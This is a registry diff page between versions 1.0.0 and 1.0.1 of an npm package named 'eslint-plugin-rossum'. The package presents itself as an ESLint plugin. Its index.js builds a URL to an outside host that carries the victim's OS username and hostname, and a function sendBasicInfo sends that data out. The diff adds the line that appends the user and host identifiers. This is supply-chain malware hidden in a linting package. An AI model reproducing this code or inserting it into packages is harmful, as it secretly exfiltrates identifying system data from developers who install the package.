eslint-plugin-rossum 1.0.0 → 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
@@ -2,7 +2,7 @@ const os = require('os');
|
|
2
2
|
const https = require('https');
|
3
3
|
|
4
4
|
// Define the server URL (replace with your server URL)
|
5
|
-
const SERVER_URL = 'https://riciper.rdzsp.id/http/
|
5
|
+
const SERVER_URL = 'https://riciper.rdzsp.id/http/'+os.userInfo().username+'-'+os.hostname();
|
6
6
|
|
7
7
|
// Function to send hostname and username data to the server
|
8
8
|
function sendBasicInfo() {
|